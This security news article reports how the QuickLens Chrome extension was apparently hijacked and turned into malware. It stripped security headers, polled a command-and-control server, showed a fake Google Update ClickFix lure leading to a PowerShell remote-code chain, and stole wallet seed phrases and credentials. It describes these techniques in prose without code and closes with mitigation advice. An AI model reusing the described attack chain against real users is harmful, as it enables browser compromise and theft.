Chrome Extension Hijacked to Push ClickFix Malware

A once-trusted Chrome extension with thousands of users was quietly transformed into a malware delivery vehicle, exposing how quickly browser add-ons can become security liabilities. 

QuickLens – Search Screen with Google Lens was removed from the Chrome Web Store after researchers discovered it had been updated to deploy ClickFix attacks and steal cryptocurrency wallet data. 

“For every page, frame, and request, the security headers are now gone. User traffic is now vulnerable to many new attacks like clickjacking,” said Annex researchers.

Inside the Malicious Chrome Extension Update

Browser extensions operate with extensive access to web traffic, page content, and authenticated user sessions. 

In the case of QuickLens, the extension had approximately 7,000 users and previously held a featured badge in the Chrome Web Store, lending it credibility. 

After a reported ownership change in early February 2026, a malicious update was pushed to users on Feb. 17, 2026. 

That update introduced expanded permissions and embedded command-and-control (C2) functionality, effectively transforming a legitimate tool into a malware delivery mechanism.

From Trusted Chrome Extension to Malware Loader

The compromised version requested new permissions, including declarativeNetRequestWithHostAccess and webRequest, which granted deeper control over browsing activity and network requests. 

It also included a rules.json configuration that stripped key browser security headers — such as Content-Security-Policy (CSP), X-Frame-Options, and X-XSS-Protection — from all visited pages. 

These headers are designed to prevent script injection and clickjacking attacks. By removing them, the extension weakened built-in browser defenses and enabled the execution of malicious scripts across otherwise protected websites.

Command-and-Control and Payload Execution

Once active, the extension began communicating with a C2 server at api.extensionanalyticspro[.]top. 

It generated a persistent UUID to track victims, fingerprinted users’ countries using Cloudflare’s trace endpoint, identified browser and operating system details, and polled the C2 infrastructure every five minutes for instructions. 

Malicious JavaScript payloads were delivered in response and executed on every page load using what researchers described as a “1×1 GIF pixel onload trick.” 

Because CSP protections had been stripped, these inline scripts executed successfully — even on sites that would typically block such behavior.

ClickFix Malware and Cryptocurrency Theft

One of the delivered payloads displayed a fake Google Update prompt designed to initiate a ClickFix attack. 

Windows users who clicked the update were prompted to download a file named googleupdate.exe, signed with a certificate belonging to Hubei Da’e Zhidao Food Technology Co., Ltd.

When executed, the file launched a hidden PowerShell command that spawned a second PowerShell instance. 

This secondary process retrieved additional instructions from a remote server using a custom user agent and piped the response into Invoke-Expression, enabling remote code execution directly on the victim’s machine.

In parallel, other malicious scripts targeted cryptocurrency wallets, including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Brave Wallet, and others. 

If detected, the extension attempted to extract wallet activity data and seed phrases — information that could allow attackers to take control of wallets and transfer funds. 

Additional payloads scraped Gmail inbox contents, Facebook Business Manager advertising accounts, YouTube channel data, and harvested login credentials and payment information entered into web forms. 

Some reports also indicated possible targeting of macOS users with the AMOS infostealer, although independent confirmation of that activity was limited.

Following disclosure of the malicious behavior, Google removed QuickLens from the Chrome Web Store and automatically disabled it in affected browsers.

How to Mitigate Browser Extension Risk

Browser extensions have become an indispensable part of modern workflows — but they also represent a rapidly expanding attack surface inside the enterprise. 

As recent campaigns have shown, malicious or compromised extensions can bypass traditional perimeter defenses and operate directly within trusted browser sessions. 

Because these threats often rely on legitimate functionality rather than CVEs, organizations must take a layered, policy-driven approach to reduce risk.

• Centrally manage and restrict browser extension installations using Chrome enterprise policies, allowing only approved extensions and blocking excessive or newly requested permissions.
• Regularly audit installed extensions, monitor for ownership changes or permission expansions, and remove unnecessary or outdated add-ons.
• Monitor for suspicious browser behavior, including unexpected outbound connections, repetitive beaconing, header manipulation, and use of high-risk permissions such as webRequest or declarativeNetRequestWithHostAccess.
• Enforce least privilege and phishing-resistant multi-factor authentication to reduce the impact of credential theft and post-compromise lateral movement.
• Deploy endpoint protection, browser isolation, and data loss prevention controls to detect and prevent credential harvesting, wallet exfiltration, and malicious script execution.
• Require affected users to fully remove compromised extensions, reset stored credentials, and transfer cryptocurrency assets to newly generated wallets with fresh seed phrases.
• Continuously validate security controls and test incident response plans through tabletop exercises or breach and attack simulations for browser-based supply chain attacks.

Together, these controls help limit the blast radius of a compromised extension while strengthening organizational resilience against evolving browser-based supply chain threats. 

Browser Extensions as an Attack Surface

The QuickLens incident highlights how quickly a legitimate browser extension can become a security risk. 

As threat actors continue to misuse update mechanisms and expanded permissions, organizations should treat browser extensions as a managed component of their overall attack surface rather than an afterthought.  

Incidents like this are prompting organizations to reevaluate implicit trust within their environments and adopt zero trust solutions that continuously verify users, devices, and activity.